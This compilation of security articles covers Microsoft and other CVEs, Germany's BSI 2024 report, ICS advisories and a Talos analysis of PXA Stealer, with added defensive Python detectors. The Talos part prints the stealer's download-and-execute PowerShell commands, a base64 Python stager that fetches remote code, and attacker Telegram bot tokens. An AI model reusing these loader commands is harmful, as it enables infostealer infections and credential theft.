Cyble IT Vulnerability Report: Microsoft Zero Days Under Attack


A pair of actively exploited Microsoft zero-day vulnerabilities highlighted an active November Patch Tuesday, which also saw updates from several IT vendors.

Overview

Cyble Research and Intelligence Labs (CRIL) researchers investigated 22 vulnerabilities and eight dark web exploits from Nov. 6 to 12 and highlighted nine vulnerabilities that merit high-priority attention from security teams.

CRIL researchers also flagged six dark web exploits of high concern in Cyble’s weekly IT vulnerability report to clients, which examined two Microsoft zero-days as well as vulnerabilities in products from Veeam, Cisco, HPE Aruba, D-Link, Citrix, and others.

Security teams should identify the vulnerabilities that are present in their environments and apply patches and mitigations promptly.

The Week’s Top IT Vulnerabilities

Here are the top IT vulnerabilities identified by Cyble threat intelligence researchers this week.

CVE-2024-43451 is an NTLM hash disclosure spoofing vulnerability affecting all supported versions of Windows that has been exploited in the wild since at least April. Researchers disclosed this week that suspected Russian hackers used it in zero-day attacks against Ukrainian entities. The attacks began with phishing emails linking to a malicious Internet shortcut (.url) file; when the user interacted with the file, the vulnerability was triggered, the machine connected to an attacker-controlled server (exposing the NTLM hash), and malware was downloaded.
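Internet shortcut files are plain INI text, so a defender can inspect them offline. The following is an added example (not part of Cyble’s report) that flags .url files whose fields would make Windows reach out to a remote host when the shortcut is handled, the behaviour the campaign above relies on. The set of fields checked and the two sample files are assumptions constructed for this example; the page does not say which field the observed samples used.

```python
import re
from configparser import ConfigParser, Error as ConfigError
from pathlib import Path
from urllib.parse import urlparse

# Internet Shortcut fields that can carry a path Windows may resolve when the
# shortcut is displayed or handled. This field list is an assumption for the
# example; the page does not say which field the observed samples used.
PATH_FIELDS = ("url", "iconfile", "workingdirectory")

# \\host\share\... (UNC path): the classic way to make Windows authenticate
# to a remote SMB server, and thereby leak an NTLM hash.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def remote_targets(url_file_text):
    """Return (field, value, host) for each field whose value points at a
    remote host via a UNC path or a file:// URL with a host component."""
    parser = ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(url_file_text)
    except ConfigError:          # not INI-shaped: nothing to inspect
        return []
    findings = []
    for section in parser.sections():
        for field, value in parser.items(section):   # field names come back lowercased
            if field not in PATH_FIELDS:
                continue
            value = value.strip()
            unc = UNC_RE.match(value)
            if unc:
                findings.append((field, value, unc.group(1)))
                continue
            parts = urlparse(value)
            if parts.scheme.lower() == "file" and parts.netloc:
                findings.append((field, value, parts.netloc))
    return findings


def scan_tree(root):
    """Yield (path, findings) for every .url file under root that has a remote target."""
    for path in Path(root).rglob("*.url"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = remote_targets(text)
        if hits:
            yield path, hits


# Constructed samples (not files from the campaign). 203.0.113.10 is a
# documentation address standing in for an attacker-controlled host.
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://example.com/
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=1
"""

SAMPLE_SUSPICIOUS = """[InternetShortcut]
URL=file://203.0.113.10/share/report.pdf
IconFile=\\\\203.0.113.10\\share\\icon.ico
IconIndex=0
"""

if __name__ == "__main__":
    for name, text in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        for field, value, host in remote_targets(text):
            print(f"{name}: {field}={value} -> remote host {host}")
```

Run `scan_tree` over a mail-attachment quarantine or a user’s Downloads folder; any hit is worth a look, since a legitimate web shortcut rarely needs an icon or working directory on a remote share.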

CVE-2024-49039 is an elevation of privilege vulnerability in Windows Task Scheduler that has also been exploited in the wild. From a low-privilege AppContainer, an attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment, Microsoft said. A successful exploit could allow an attacker to execute RPC functions that are restricted to privileged accounts.

CVE-2024-49040 is a high-severity spoofing vulnerability in Microsoft Exchange Server that lets attackers forge the sender of incoming email, making malicious messages far more convincing. A researcher has published a proof of concept (PoC) for the flaw, but Microsoft paused the update after some customers reported Transport rules stopping periodically once it was installed.

CVE-2024-40711 is a critical deserialization-of-untrusted-data vulnerability in Veeam Backup & Replication (VBR) servers that unauthenticated attackers can exploit to gain remote code execution (RCE). It was previously used in Akira and Fog ransomware attacks, and researchers now observe it being exploited to deploy a newly identified strain of Frag ransomware.

CVE-2024-42509 and CVE-2024-47460 are command injection vulnerabilities in the AOS-8 and AOS-10 versions of HPE Aruba’s network operating system. The flaw lies in the underlying CLI service and is reached by sending specially crafted packets to the PAPI (Aruba’s access point management protocol) UDP port 8211, giving an unauthenticated attacker remote code execution as a privileged user on the underlying operating system. Cyble researchers detailed these and related vulnerabilities in a separate blog.

CVE-2024-20418 is a critical vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) access points, which provide wireless connectivity for industrial applications. An attacker could exploit it by sending crafted HTTP requests to the management interface of an affected system, and a successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system of the device. Cyble also covered this vulnerability in a separate blog.

CVE-2024-10914 is a critical command injection vulnerability in end-of-life (EOL) D-Link network-attached storage (NAS) devices. Unauthenticated attackers can exploit it to inject arbitrary shell commands by sending malicious HTTP GET requests to vulnerable D-Link NAS devices exposed online. Researchers observed that attackers are exploiting the vulnerability with publicly available exploit codes.

CVE-2024-11068 is a critical incorrect use of privileged API vulnerability impacting the end-of-life D-Link DSL6740C modem. The vulnerability allows unauthenticated remote attackers to modify any user’s password by leveraging the API, thereby granting access to Web, SSH, and Telnet services using that user’s account. Since D-Link recently announced that it will not provide patches or updates for this EOL product, the vulnerability poses a significant risk to users.

Vulnerabilities and Exploits on Underground Forums

CRIL researchers also observed multiple Telegram channels and underground forums where threat actors shared or discussed exploits weaponizing vulnerabilities. Those vulnerabilities include:

CVE-2024-39205: A critical vulnerability in pyload-ng version 0.5.0b3.dev85 when running under Python 3.11 or below. It allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.

CVE-2024-50340: A high-severity vulnerability in the Symfony PHP framework that allows an attacker to manipulate the application’s environment or debug mode by sending specially crafted query strings.

CVE-2024-8068 and CVE-2024-8069: These recently identified vulnerabilities in Citrix Session Recording pose significant security risks for Citrix environments. CVE-2024-8068 allows for privilege escalation to the NetworkService Account access level, and the vulnerability CVE-2024-8069 allows for limited remote code execution with the privileges of a NetworkService Account.

CVE-2024-47295: A high-severity vulnerability identified in the SEIKO EPSON Web Config allows a remote unauthenticated attacker to set an arbitrary administrator password on affected devices. The vulnerability results from an insecure initial password configuration in which the administrator password is left blank.

CRIL researchers also observed a threat actor discussing the critical vulnerability CVE-2023-38408, which affects 26 million internet-facing OpenSSH assets detected by Cyble. The vulnerability allows for remote code execution (RCE) when the SSH agent is forwarded to an attacker-controlled system.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Implement immutable, air-gapped, ransomware-resistant backup procedures for sensitive and critical data.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.


Germany’s Cybersecurity Landscape in 2024 is Worrying but Gaining Resilience


Germany’s Federal Office for Information Security (BSI) recently released The State of Cybersecurity 2024 report, which illuminates the critical threats and advances in resilience across Germany’s digital landscape.

In a joint press briefing, Federal Minister of the Interior Nancy Faeser and BSI President Claudia Plattner said that while the cyberthreat landscape remains tense, resilience measures are proving effective in protecting businesses, institutions, and democratic processes.

Federal Minister Nancy Faeser noted the importance of cybersecurity for societal stability, stating, “Cybersecurity is central to our society and affects each and every one of us.” She highlighted that extortion, cyber espionage, and hybrid threats—especially from state-sponsored actors—continue to pose significant risks, necessitating robust cybersecurity investments to safeguard democratic institutions.

BSI President Claudia Plattner reinforced this stance, noting that Germany has witnessed increased resilience against cyber threats. However, she warned against complacency: “We must continue to increase our resilience in a nationwide effort.” Both leaders stressed the importance of swiftly incorporating the NIS-2 Directive into national law to fortify Germany’s cyber defenses.

Key Findings from BSI’s 2024 Report

Rising Threats from Malware and Ransomware Attacks

Between mid-2023 and mid-2024, an alarming increase in malware variants was recorded, with an average of 309,000 new variants discovered daily—a 26% increase over the previous year. Much of this rise is attributed to attacks targeting 64-bit Windows systems and an above-average increase in Android malware.

Figure 1 – Rising threats in Germany’s cyber threat landscape (Source: BSI)

Ransomware continues to be a significant challenge, especially for businesses and government institutions. Data leaks following ransomware attacks have increased, although the percentage of victims paying ransom has dropped. LockBit leads the list of the five most active groups targeting Germany. The group published 40 alleged leak victims on its leak site during the reporting period, followed by BlackBasta and 8Base.

Figure 2 – Top 5 leak pages, July 2023 to June 2024 (Source: BSI)

Many organizations now rely on robust backup systems, reducing their dependency on attackers to restore encrypted data. BSI observed that transparent communication about cyber incidents has helped mitigate potential impacts, as other organizations can swiftly address and close similar vulnerabilities.

Advanced Persistent Threats (APT) and Cyber Espionage

Germany noted the surge in persistent threats from Advanced Persistent Threat (APT) groups, many of which are state-sponsored. Against a backdrop of geopolitical tension, these groups are increasingly targeting political parties, governmental agencies, and corporations for cyber espionage. Germany urged its public and private sectors to adopt proactive threat intelligence and protective measures to defend against these sophisticated, continuous attacks.

Cybersecurity for Elections: Ensuring Democratic Integrity

German voters went to the polls not only in the European elections but also in three state elections (Saxony, Thuringia, and Brandenburg) and nine local elections. The BSI noted that the electoral process, communication by authorities and the media, and the formation of public opinion around elections now depend heavily on information technology and are therefore central to information security.

BSI provided dedicated security oversight, working with electoral authorities to protect the integrity of the voting process. As Germany heads toward future elections, the BSI has enhanced its monitoring and support for political entities, prioritizing resilience against potential cyber threats and disinformation campaigns from state actors.

Emerging Cybersecurity Challenges

Increase in High-Volume DDoS Attacks

The first half of 2024 saw a substantial uptick in Distributed Denial of Service (DDoS) attacks, with a marked increase in high-volume attacks exceeding 10,000 Mbps. DDoS attacks not only disrupt services but are increasingly used to sow public uncertainty by exaggerating their impact on social media.

Figure 3 – Proportion of High-Bandwidth DDoS attacks doubled in April 2024 (Source: BSI)

The BSI recommends adopting advanced DDoS mitigation strategies, particularly for critical infrastructure, to withstand these escalating attack volumes.

Data Theft Targeting Consumers

Phishing remains a major threat to German citizens, with attackers expanding beyond financial institution impersonation to include popular streaming services. During 2024, phishing campaigns have increasingly targeted user data—such as credit card information and personal identifiers—via emails masquerading as communications from banks and entertainment platforms. The BSI advises consumers to stay vigilant and adopt robust identity protection measures to counter phishing attempts.

Strategic Initiatives to Strengthen Cyber Resilience

Cybernation Germany Initiative

The Cybernation Germany initiative, launched in early 2024, is a step towards a national commitment to building resilience and expanding Germany’s cybersecurity expertise. The initiative’s goals align with the NIS-2 Directive and the Cyber Resilience Act (CRA), which impose mandatory cybersecurity measures and incident reporting standards for companies. The CRA emphasizes a “security by design” approach, particularly for IoT devices, to bolster protections across interconnected networks.

This initiative demonstrates a concerted push from Germany towards enhanced threat intelligence, cyber resilience, and protective infrastructure.

Key Recommendations from BSI for Strengthening Cybersecurity

  1. Governance and Risk-Based Policies: Organizations should maintain updated, approved cybersecurity policies, leveraging threat intelligence to refine policies and prioritize high-risk threats.
  2. Enhanced Monitoring and Detection: With the rise in malware and ransomware, BSI recommends integrating Security Operations Centers (SOC) with continuous threat detection and red teaming exercises to effectively simulate real-world scenarios.
  3. Incident Response and Recovery: BSI encourages organizations to establish structured Incident Response plans, supported by Cyber Threat Intelligence (CTI), to reduce response times and facilitate efficient recovery from cyber incidents.
  4. Increased Public Awareness and Resilience Measures: Awareness campaigns, employee training, and enhanced communication strategies have proven effective in helping organizations and consumers defend against phishing and ransomware attacks.
  5. Collaboration with International Security Standards: Adhering to NIS-2 and the Cyber Resilience Act ensures that German entities align with European cybersecurity standards, enhancing cross-border protections and maintaining consistent security measures across sectors.

Conclusion: A Proactive Path Forward

The BSI’s 2024 report reaffirms Germany’s proactive approach to cybersecurity, emphasizing resilience, regulatory compliance, and advanced threat intelligence.

With heightened preparedness across government, businesses, and society, Germany is well-positioned to defend against increasingly sophisticated cyber threats. However, as Minister Faeser stated, the evolving cyber threat landscape necessitates continuous investment and adaptation to safeguard Germany’s critical infrastructure and democratic systems.

Germany’s Cybernation initiative and collaboration with international cybersecurity frameworks hint at a robust defense strategy that other nations can use as a model. By maintaining proactive measures, aligning with global security standards, and fostering a culture of resilience, Germany aims to ensure cybersecurity remains integral to its digital and democratic future.

References:

https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2024/241112_Lagebericht_2024.html

https://www.bsi.bund.de/EN/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html


Key Industrial Control System Vulnerabilities Identified in Recent CISA Advisories


Overview

Cyble Research & Intelligence Labs’ (CRIL) Weekly Industrial Control System (ICS) Vulnerability Intelligence Report has highlighted multiple security vulnerabilities disclosed by the Cybersecurity and Infrastructure Security Agency (CISA).

These ICS vulnerabilities affect critical components from Bosch Rexroth, Delta Electronics, and Beckhoff Automation. With several of them posing substantial risks to operational continuity, prompt patching and mitigation are critical.

CISA issued three security advisories this week, each addressing several Industrial Control System vulnerabilities with varying severity. The vulnerabilities affect products integral to manufacturing, energy, and utilities. Cyble Research & Intelligence Labs has emphasized the need to prioritize patching certain vulnerabilities due to their potential impact on operational systems and the risk of exploitation by cyber adversaries.

The most concerning vulnerabilities include stack-based buffer overflow issues in Delta Electronics’ DIAScreen and a command injection vulnerability in Beckhoff Automation’s TwinCAT Control Package. If exploited, these vulnerabilities could lead to severe disruptions, including device crashes, remote code execution, and unauthorized command execution.

Detailed Vulnerability Analysis

The vulnerabilities identified this week affect multiple products and vendors within the ICS environment.

Bosch Rexroth – Uncontrolled Resource Consumption in IndraDrive Controllers

CVE-2024-48989 is a high-severity vulnerability affecting Bosch Rexroth AG’s IndraDrive FWA-INDRV*-MP* firmware and IndraDrive controllers. It stems from uncontrolled resource consumption in the affected devices and, if exploited, could lead to system instability or a denial of service (DoS).

To mitigate this vulnerability, it is strongly recommended that organizations immediately apply the vendor’s patch. This will minimize the risk of exploitation and ensure the continued reliability and security of the affected devices.

Delta Electronics – Multiple Stack-Based Buffer Overflow Vulnerabilities in DIAScreen

The vulnerabilities identified as CVE-2024-47131, CVE-2024-39605, and CVE-2024-39354 are high-severity issues affecting Delta Electronics’ DIAScreen versions prior to v1.5.0. These vulnerabilities stem from buffer overflow issues within the system, which could cause the device to crash when exploited. If successfully attacked, remote adversaries could execute arbitrary code on the compromised device, potentially leading to a complete device compromise and significant operational downtime.

To mitigate the risks associated with these vulnerabilities, Delta Electronics has released patches that address the issue. Organizations using affected versions are strongly advised to upgrade to the latest software versions to protect their systems. Additionally, implementing network segmentation can help minimize the exposure of critical assets, further reducing the likelihood of successful exploitation.

Beckhoff Automation – Command Injection in TwinCAT Control Package

CVE-2024-8934 is a medium-severity vulnerability affecting the TwinCAT Control Package for versions prior to 1.0.603.0. This vulnerability arises from a command injection flaw, which could allow attackers to execute arbitrary commands within the system. If successfully exploited, this could compromise the underlying infrastructure, potentially impacting the security and stability of the affected systems.

To address this issue, organizations should upgrade to the latest version of the TwinCAT Control Package. This will effectively mitigate the vulnerability. Additionally, to further protect against exploitation, restricting access to the affected systems through network-level controls is advisable.

The vulnerabilities disclosed in this report demonstrate a concerning trend in the ICS vulnerability environment. The data from CISA reveals that a large proportion of the vulnerabilities affecting Industrial Control Systems (ICS) fall under critical or high-severity categories. Specifically, 50% of the identified vulnerabilities are classified as critical, while 30% are categorized as high severity.

In contrast, medium-severity vulnerabilities account for 15% of the total, while low-severity vulnerabilities make up just 5%. This distribution underscores the increasing risks posed by ICS vulnerabilities, highlighting the critical importance of implementing robust vulnerability management strategies to address and mitigate potential threats.

Recommendations for Mitigating ICS Vulnerabilities

To effectively manage and mitigate the risks associated with these vulnerabilities, the following steps are recommended:

  1. Organizations should follow the guidance provided by CISA and apply patches as soon as they become available. Staying up to date with vendor updates and security advisories is critical to ensuring that vulnerabilities are addressed promptly.
  2. Segregating ICS networks from other parts of the IT infrastructure can help prevent lateral movement in case of a breach. Implementing a Zero-Trust Architecture is also advisable to limit the potential for exploitation.
  3. Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks.
  4. Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them. Engaging threat intelligence services and staying updated with CISA’s vulnerability intelligence reports is essential for proactive defense.
  5. Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise.

Conclusion

The ICS vulnerabilities highlighted by CISA demonstrate the rise of new risks targeting the industrial sector. By implementing comprehensive patch management strategies, enhancing network security, and staying informed about CISA’s vulnerability alerts, organizations can reduce their exposure to these risks and better protect their critical assets from potential exploitation.

Proactive measures such as regular security audits, network segmentation, and continuous monitoring will be essential for ensuring the ongoing safety and security of Industrial Control Systems and their associated networks.


New PXA Stealer targets government and education sectors for sensitive information

  • Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.  
  • We discovered a new Python program called PXA Stealer that targets victims’ sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. 
  • PXA Stealer has the capability to decrypt the victim’s browser master password and uses it to steal the stored credentials of various online accounts.  
  • The attacker has used complex obfuscation techniques for the batch scripts used in this campaign. 
  • We discovered the attacker selling credentials and tools in the Telegram channel “Mua Bán Scan MINI,” which is where the CoralRaider adversary operates, but we are not sure if the attacker belongs to the CoralRaider threat group or another Vietnamese cybercrime group. 

Victimology and targeted information  


The attacker is targeting the education sector in India and government organizations in European countries, including Sweden and Denmark, based on Talos telemetry data.  

The attacker’s motive is to steal the victim’s information, including credentials for various online accounts, browser login data, cookies, autofill information, credit card details, data from various cryptocurrency online and desktop wallets, data from installed VPN clients, gaming software accounts, chat messengers, password managers, and FTP clients.  


Attacker’s infrastructure 

Talos discovered that the attacker was hosting malicious scripts and the stealer program on a domain, tvdseo[.]com, in the directories “/file”, “/file/PXA/”, “/file/STC/”, and “/file/Adonis/”. The domain belongs to a Vietnamese professional search engine optimization (SEO) service provider; however, we are not certain whether the attacker has compromised the domain to host the malicious files or has subscribed to get legitimate access while still using it for their malicious purposes. 

We found that the attacker uses a Telegram bot to exfiltrate victims’ data. Our analysis of the payload, PXA Stealer, revealed several attacker-controlled Telegram bot tokens and chat IDs.

Attacker-controlled Telegram bot tokens:

7545164691:AAEJ4E2f-4KZDZrLID8hSRSJmPmR1h-a2M4

7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs

Attacker-controlled Telegram chat IDs:

-1002174636072
-1002150158011
-4559798560
-4577199885
-4575205410

Attacker’s underground activities 

We identified the attacker’s Telegram account, “Lone None,” which was hardcoded in the PXA Stealer program. Details of the account, including a Vietnamese national flag icon and a picture of the emblem of Vietnam’s Ministry of Public Security, align with our assessment that the attacker is of Vietnamese origin, as do the Vietnamese-language comments we found in the PXA Stealer code.


The attacker’s Telegram account has biography data that includes a link to a private antivirus checker website that allows users or buyers to assess the detection rate of a malware program. This website provides a platform for potential threat actors to evaluate the effectiveness and stealth capabilities of the malware before purchasing it, indicating a sophisticated level of service and professionalism in the threat actor’s operations. 


We also discovered that the attacker is active in an underground Telegram channel, “Mua Bán Scan MINI,” mainly selling Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundering data. Talos observed that this Vietnamese actor is also present in the Telegram group in which the CoralRaider actor operates; however, we are not certain whether the actor is a member of the CoralRaider gang or of another Vietnamese cybercrime group.

Talos also found the attacker promoting another underground Telegram channel, “Cú Black Ads – Dropship,” by sharing a few automation tools for managing large numbers of user accounts in their own channel. That channel exchanges and sells information related to social media accounts, proxy services, and a batch account creator tool.


The tools shared by the attacker in the group are automated utilities designed to manage several user accounts. These tools include a Hotmail batch creation tool, an email mining tool, and a Hotmail cookie batch modification tool. The compressed packages provided by the threat actor often contain not only the executable files for these tools but also their source code, allowing users to modify them as needed.  

Hotmail batch creation tool from the Telegram channel.
Hotmail cookie batch modification tool from the Telegram channel.

We found that the attacker is not sharing all the tools for free, and some of them require users to send a unique key back to the Telegram channel administrator for software activation. This process ensures that only those who have been vetted or have paid for the tool can access its full functionality.  We also discovered that these tools are distributed on other websites, such as aehack[.]com, highlighting that they are selling the tools. Additionally, a YouTube channel exists that provides tutorials on how to use these tools, further facilitating their widespread use and demonstrating the organized efforts to market and instruct potential users on their application. 


Infection Chain


According to our telemetry, the attacker gains initial access with a phishing email carrying a ZIP attachment. The ZIP contains a malicious loader executable written in Rust and a hidden folder called Photos, which in turn contains nested folders such as Documents and Images holding obfuscated Windows batch scripts and a decoy PDF document.


When a victim extracts the attachment ZIP file, the hidden folder and the malicious Rust loader executable are dropped onto the victim machine. When the malicious Rust loader executable is run by the victim, it loads and executes multiple obfuscated batch scripts that are in the dropped hidden folders.   

We deobfuscated the Windows batch scripts using CyberChef; each step must be applied precisely and in order to recover the script. First, we used a regular expression to strip the random padding strings: runs of six to nine upper- and lowercase letters (A to Z) enclosed in “%” symbols. Next, we removed the “^” symbols together with the remaining stray letters (A to Z) and the special characters “_”, “/’(?)”, “$”, “#”, and “[]”. Finally, we removed the leftover “%” symbols, which revealed the scripts’ PowerShell commands.

Snippet of the obfuscated batch script 

Snippet of the deobfuscated batch script 

The batch scripts execute PowerShell commands simultaneously, performing the following activities on the victim machine: 

  • Opens a decoy PDF document of a Glassdoor job application form. 
  • Downloads a portable Python 3.10 package archive masquerading as “synaptics.zip”, hosted on the attacker-controlled domain at the hardcoded URL “hxxps[://]tvdseo[.]com/file/synaptics[.]zip”, saves it under random file names in both the user profile’s temporary folder and the public user’s folder, and extracts both copies. 

C:\WINDOWS\system32\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', [System[.]IO[.]Path]::GetTempPath() + 'EAnLaxUKaI[.]zip') 
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]SecurityProtocolType]::Tls12; (New-Object -TypeName System[.]Net[.]WebClient).DownloadFile('hxxps[://]tvdseo[.]com/file/synaptics[.]zip', 'C:\Users\Public\oZHyMUy4qk[.]zip')  
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo $dst = [System[.]IO[.]Path]::Combine([System[.]Environment]::GetFolderPath('LocalApplicationData'), 'EAnLaxUKaI'); Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force $dst\* } else { New-Item -ItemType Directory -Force $dst } ; [System[.]IO[.]Compression[.]ZipFile]::ExtractToDirectory([System[.]IO[.]Path]::Combine([System[.]IO[.]Path]::GetTempPath(), 'EAnLaxUKaI[.]zip'), $dst)  
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSystem; [System[.]IO[.]Compression[.]ZipFile]::ExtractToDirectory('C:/Users/Public/oZHyMUy4qk[.]zip', 'C:/Users/Public/oZHyMUy4qk')  

  • Then, it creates and runs a Windows shortcut file named “WindowsSecurity.lnk” in the user’s local application data folder (%LOCALAPPDATA%), passing a base64-encoded Python one-liner as the shortcut’s command-line argument, and sets a value under the “Run” registry key pointing at the shortcut to establish persistence. 

C:\WINDOWS\system32\cmd[.]exe /S /D /c echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS9maWxlL1BYQS9QWEFfUFVSRV9FTkMnKS5yZWFkKCkuZGVjb2RlKCd1dGYtOCcpKSk='))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save()  
  
C:\WINDOWS\system32\cmd[.]exe /S /D /c echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\Marsi\AppData\Local\WindowsSecurity.lnk' -Force 

  • The shortcut runs the disguised portable Python executable with a one-line script that downloads a base64-encoded Python program from the remote server and executes it in memory. The downloaded program contains instructions to disable the antivirus programs on the victim’s machine.  

cmd[.]exe /c start "" /min C:\Users\Public\oZHyMUy4qk\synaptics[.]exe -c "import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_PURE_ENC')[.]read()[.]decode('utf-8')))" 

  • Next, the batch script runs another command that downloads the PXA Stealer Python program and executes it with the masqueraded portable Python executable “synaptics.exe” on the victim’s machine.  

cmd[.]exe /c start /min C:\Users\Public\oZHyMUy4qk\synaptics[.]exe -c import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT')[.]read()[.]decode('utf-8'))) 

  • Another batch script, “WindowsSecurity.bat”, is dropped in the Windows Startup folder of the victim’s machine as a second persistence mechanism; it carries the same command to download and execute the PXA Stealer Python program shown above.  
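The persistence chain above can be triaged from a host with the following Python, an added example that is neither Talos' code nor the stealer's. It runs over constructed data: a fictitious user “alice”, a set of HKCU Run values, a Startup-folder listing, and the resolved target of the shortcut (what an analyst would read out of the .lnk with a LNK parser). Collecting those from a live host is assumed and not shown. The rules encode the three tells described above: explorer.exe used as a proxy to launch a shortcut from a user-writable directory, a Python “-c” one-liner that exec()s a base64-decoded blob, and the renamed interpreter “synaptics.exe” running outside Program Files.

```python
import re

# Directories a standard user can write to; legitimate autostart entries rarely live here.
USER_WRITABLE = re.compile(r"\\(?:Users\\Public|AppData\\(?:Local|Roaming)|Temp)\\", re.IGNORECASE)
# "explorer.exe <path>.lnk": explorer is used as a proxy to launch the shortcut.
EXPLORER_LNK = re.compile(r'explorer\.exe\s+"?([^"\s]+\.lnk)', re.IGNORECASE)
# Python "-c" one-liner that exec()s a base64-decoded blob (the downloader stub above).
INLINE_PYTHON = re.compile(r'\s-c\s+"?import\s.*\bexec\(.*base64\.b64decode\(', re.IGNORECASE)
# The renamed portable interpreter; a real Synaptics driver does not run from user directories.
PY_MASQUERADE = re.compile(r"\\synaptics\.exe\b", re.IGNORECASE)


def findings_for_command(origin, cmd, lnk_commands):
    """Apply the rules to one command line; follow a launched .lnk to its real target."""
    found = []
    m = EXPLORER_LNK.search(cmd)
    if m:
        lnk = m.group(1)
        if USER_WRITABLE.search(lnk):
            found.append(f"{origin}: explorer.exe launches shortcut from user-writable path {lnk}")
        target = lnk_commands.get(lnk)
        if target:
            found.extend(findings_for_command(origin + " -> " + lnk, target, lnk_commands))
    if INLINE_PYTHON.search(cmd):
        found.append(f"{origin}: inline Python '-c' that exec()s a base64-decoded blob")
    if PY_MASQUERADE.search(cmd) and USER_WRITABLE.search(cmd):
        found.append(f"{origin}: synaptics.exe running from a user-writable directory")
    return found


def triage(run_values, startup_files, lnk_commands):
    """run_values: {value name: command}; startup_files: paths in the Startup folder;
    lnk_commands: {shortcut path: target + arguments}. Returns a list of finding strings."""
    findings = []
    for name, cmd in run_values.items():
        findings.extend(findings_for_command("Run\\" + name, cmd, lnk_commands))
    for path in startup_files:
        # Shortcuts in Startup are common and legitimate; scripts there are worth a look.
        if path.lower().endswith((".bat", ".cmd", ".vbs", ".ps1")):
            findings.append(f"Startup: script in Startup folder: {path}")
    return findings


# Constructed sample data modelled on the persistence described above (not real telemetry).
RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Windows Security": r"C:\Windows\Explorer.EXE C:\Users\alice\AppData\Local\WindowsSecurity.lnk",
}
STARTUP_FILES = [
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat",
]
# Resolved shortcut target (URL is a placeholder, not the campaign's).
LNK_COMMANDS = {
    r"C:\Users\alice\AppData\Local\WindowsSecurity.lnk":
        r'C:\Users\alice\AppData\Local\EAnLaxUKaI\synaptics.exe -c "import urllib.request;import base64;'
        "exec(base64.b64decode(urllib.request.urlopen('https://example.invalid/stage2').read()))\"",
}

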